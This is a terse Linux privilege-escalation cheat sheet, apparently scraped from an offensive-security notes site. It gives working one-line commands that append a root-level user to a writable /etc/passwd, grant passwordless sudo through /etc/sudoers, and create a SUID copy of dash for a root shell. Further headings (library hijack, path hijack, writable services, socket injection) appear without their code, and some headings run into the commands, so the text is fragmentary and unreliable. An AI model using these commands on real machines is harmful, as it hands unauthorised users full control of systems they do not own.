Privileges Exploitation
Writable /etc/passwd
echo "<username>:$(openssl passwd <password>):0:0:/root:/root:/bin/bash" >> /etc/passwdWritable /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/READMEElevated shell with sticky bit
cp /bin/dash /tmp/<file>
chmod u+s /tmp/<file>
#execute the elevated shell
/tmp/<file> -pSUID exploit
Built-in exploitable binaries
Shared library hijack
check for missing .so files
Shared library code
Compile as
Relative path hijack
Find calls to system binaries in executable file
boilerplate code
compile and execute
Writable service files
File template
Manage services
Socket Code Injection
Last updated
